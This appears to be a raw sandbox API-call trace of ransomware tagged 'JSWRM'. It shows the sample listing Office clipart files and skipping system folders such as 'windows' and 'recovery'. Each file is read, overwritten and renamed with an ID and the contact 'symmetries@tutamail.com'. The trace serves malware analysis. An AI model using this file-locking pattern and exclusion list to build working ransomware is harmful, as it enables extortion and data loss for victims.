[0091.507] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cca8 [0091.507] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2477a0 [0091.507] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cca8 | out: hHeap=0x1e0000) returned 1 [0091.507] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0091.507] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00538_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na00538_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00538_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na00538_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0091.508] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2477a0 | out: hHeap=0x1e0000) returned 1 [0091.508] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2100c0 | out: hHeap=0x1e0000) returned 1 [0091.508] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210580 | out: hHeap=0x1e0000) returned 1 [0091.508] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf5aa7bb, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xf5aa7bb, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xf5aa7bb, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x64c, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="NA00641_.WMF", cAlternateFileName="")) returned 1 [0091.508] lstrcmpiW (lpString1="NA00641_.WMF", lpString2=".") returned 1 [0091.508] lstrcmpiW (lpString1="NA00641_.WMF", lpString2="..") returned 1 [0091.508] lstrcmpiW (lpString1="NA00641_.WMF", lpString2="...") returned 1 [0091.508] lstrcmpiW (lpString1="NA00641_.WMF", lpString2="windows") returned -1 [0091.508] lstrcmpiW (lpString1="NA00641_.WMF", lpString2="recovery") returned -1 [0091.508] lstrcmpiW (lpString1="NA00641_.WMF", lpString2="perflogs") returned -1 [0091.508] lstrcmpiW (lpString1="NA00641_.WMF", lpString2="documents and settings") returned 1 [0091.508] lstrcmpiW (lpString1="NA00641_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0091.508] lstrcmpiW (lpString1="NA00641_.WMF", lpString2="system volume information") returned -1 [0091.508] lstrcmpiW (lpString1="NA00641_.WMF", lpString2="msocache") returned 1 [0091.508] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241290 [0091.508] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA00641_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0091.508] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA00641_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NA00641_.WMF", lpUsedDefaultChar=0x0) returned 12 [0091.508] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241290 | out: hHeap=0x1e0000) returned 1 [0091.509] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241218 [0091.509] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA00641_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0091.509] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA00641_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NA00641_.WMF", lpUsedDefaultChar=0x0) returned 12 [0091.509] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241218 | out: hHeap=0x1e0000) returned 1 [0091.509] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2106b0 [0091.509] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2107e0 | out: hHeap=0x1e0000) returned 1 [0091.509] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0091.509] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0091.509] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210450 [0091.509] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00641_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na00641_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0091.515] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=1612) returned 1 [0091.515] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0091.515] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x640) returned 0x2332c0 [0091.515] ReadFile (in: hFile=0x314, lpBuffer=0x2332c0, nNumberOfBytesToRead=0x640, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x2332c0*, lpNumberOfBytesRead=0x345e89c*=0x640, lpOverlapped=0x0) returned 1 [0091.516] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0091.516] WriteFile (in: hFile=0x314, lpBuffer=0x2332c0*, nNumberOfBytesToWrite=0x640, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x2332c0*, lpNumberOfBytesWritten=0x345e898*=0x640, lpOverlapped=0x0) returned 1 [0091.516] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2332c0 | out: hHeap=0x1e0000) returned 1 [0091.516] CloseHandle (hObject=0x314) returned 1 [0091.517] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210c08 [0091.517] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0091.517] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0091.517] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0091.517] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0091.517] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0091.517] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0091.517] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a498 [0091.517] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a498, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0091.517] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a498 | out: hHeap=0x1e0000) returned 1 [0091.517] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cf48 [0091.518] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247b80 [0091.518] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cf48 | out: hHeap=0x1e0000) returned 1 [0091.518] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0091.518] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00641_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na00641_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00641_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na00641_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0091.518] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247b80 | out: hHeap=0x1e0000) returned 1 [0091.518] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210c08 | out: hHeap=0x1e0000) returned 1 [0091.518] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210450 | out: hHeap=0x1e0000) returned 1 [0091.518] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf58455c, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xf58455c, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xf5aa7bb, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x7658, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="NA00784_.WMF", cAlternateFileName="")) returned 1 [0091.518] lstrcmpiW (lpString1="NA00784_.WMF", lpString2=".") returned 1 [0091.518] lstrcmpiW (lpString1="NA00784_.WMF", lpString2="..") returned 1 [0091.518] lstrcmpiW (lpString1="NA00784_.WMF", lpString2="...") returned 1 [0091.518] lstrcmpiW (lpString1="NA00784_.WMF", lpString2="windows") returned -1 [0091.518] lstrcmpiW (lpString1="NA00784_.WMF", lpString2="recovery") returned -1 [0091.519] lstrcmpiW (lpString1="NA00784_.WMF", lpString2="perflogs") returned -1 [0091.519] lstrcmpiW (lpString1="NA00784_.WMF", lpString2="documents and settings") returned 1 [0091.519] lstrcmpiW (lpString1="NA00784_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0091.519] lstrcmpiW (lpString1="NA00784_.WMF", lpString2="system volume information") returned -1 [0091.519] lstrcmpiW (lpString1="NA00784_.WMF", lpString2="msocache") returned 1 [0091.519] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0091.519] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA00784_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0091.519] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA00784_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NA00784_.WMF", lpUsedDefaultChar=0x0) returned 12 [0091.519] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0091.519] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0091.519] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA00784_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0091.519] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA00784_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NA00784_.WMF", lpUsedDefaultChar=0x0) returned 12 [0091.519] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0091.519] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2100c0 [0091.519] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2106b0 | out: hHeap=0x1e0000) returned 1 [0091.519] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0091.519] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0091.519] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210c08 [0091.519] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00784_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na00784_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0091.520] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=30296) returned 1 [0091.520] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0091.520] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x7650) returned 0x24d210 [0091.521] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x7650, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x7650, lpOverlapped=0x0) returned 1 [0091.524] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0091.524] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x7650, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x7650, lpOverlapped=0x0) returned 1 [0091.525] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0091.525] CloseHandle (hObject=0x314) returned 1 [0091.525] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210910 [0091.525] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0091.526] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0091.526] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0091.526] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0091.526] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0091.526] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0091.526] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a4b0 [0091.526] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a4b0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0091.526] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a4b0 | out: hHeap=0x1e0000) returned 1 [0091.526] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cdf8 [0091.526] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2476a8 [0091.526] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cdf8 | out: hHeap=0x1e0000) returned 1 [0091.526] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0091.526] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00784_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na00784_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00784_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na00784_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0091.527] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2476a8 | out: hHeap=0x1e0000) returned 1 [0091.527] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210910 | out: hHeap=0x1e0000) returned 1 [0091.527] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210c08 | out: hHeap=0x1e0000) returned 1 [0091.527] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf58455c, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xf58455c, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xf58455c, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x23f8, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="NA00798_.WMF", cAlternateFileName="")) returned 1 [0091.527] lstrcmpiW (lpString1="NA00798_.WMF", lpString2=".") returned 1 [0091.527] lstrcmpiW (lpString1="NA00798_.WMF", lpString2="..") returned 1 [0091.527] lstrcmpiW (lpString1="NA00798_.WMF", lpString2="...") returned 1 [0091.527] lstrcmpiW (lpString1="NA00798_.WMF", lpString2="windows") returned -1 [0091.527] lstrcmpiW (lpString1="NA00798_.WMF", lpString2="recovery") returned -1 [0091.527] lstrcmpiW (lpString1="NA00798_.WMF", lpString2="perflogs") returned -1 [0091.527] lstrcmpiW (lpString1="NA00798_.WMF", lpString2="documents and settings") returned 1 [0091.527] lstrcmpiW (lpString1="NA00798_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0091.527] lstrcmpiW (lpString1="NA00798_.WMF", lpString2="system volume information") returned -1 [0091.527] lstrcmpiW (lpString1="NA00798_.WMF", lpString2="msocache") returned 1 [0091.527] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fc0 [0091.527] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA00798_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0091.527] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA00798_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NA00798_.WMF", lpUsedDefaultChar=0x0) returned 12 [0091.527] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fc0 | out: hHeap=0x1e0000) returned 1 [0091.527] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413d0 [0091.527] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA00798_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0091.527] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA00798_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NA00798_.WMF", lpUsedDefaultChar=0x0) returned 12 [0091.527] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413d0 | out: hHeap=0x1e0000) returned 1 [0091.527] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2107e0 [0091.527] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2100c0 | out: hHeap=0x1e0000) returned 1 [0091.527] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0091.527] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0091.527] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210450 [0091.527] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00798_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na00798_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0091.528] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=9208) returned 1 [0091.528] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0091.528] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x23f0) returned 0x24d210 [0091.529] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x23f0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x23f0, lpOverlapped=0x0) returned 1 [0091.531] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0091.531] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x23f0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x23f0, lpOverlapped=0x0) returned 1 [0091.531] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0091.531] CloseHandle (hObject=0x314) returned 1 [0091.531] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ad8 [0091.531] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0091.531] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0091.531] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22ce70, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0091.531] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0091.531] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0091.531] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0091.531] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1f8 [0091.531] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1f8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0091.531] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1f8 | out: hHeap=0x1e0000) returned 1 [0091.531] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d098 [0091.531] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2476a8 [0091.531] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d098 | out: hHeap=0x1e0000) returned 1 [0091.531] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0091.531] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00798_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na00798_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00798_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na00798_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0091.532] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2476a8 | out: hHeap=0x1e0000) returned 1 [0091.532] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ad8 | out: hHeap=0x1e0000) returned 1 [0091.532] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210450 | out: hHeap=0x1e0000) returned 1 [0091.532] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf58455c, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xf58455c, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xf58455c, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x788, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="NA00806_.WMF", cAlternateFileName="")) returned 1 [0091.532] lstrcmpiW (lpString1="NA00806_.WMF", lpString2=".") returned 1 [0091.532] lstrcmpiW (lpString1="NA00806_.WMF", lpString2="..") returned 1 [0091.532] lstrcmpiW (lpString1="NA00806_.WMF", lpString2="...") returned 1 [0091.532] lstrcmpiW (lpString1="NA00806_.WMF", lpString2="windows") returned -1 [0091.532] lstrcmpiW 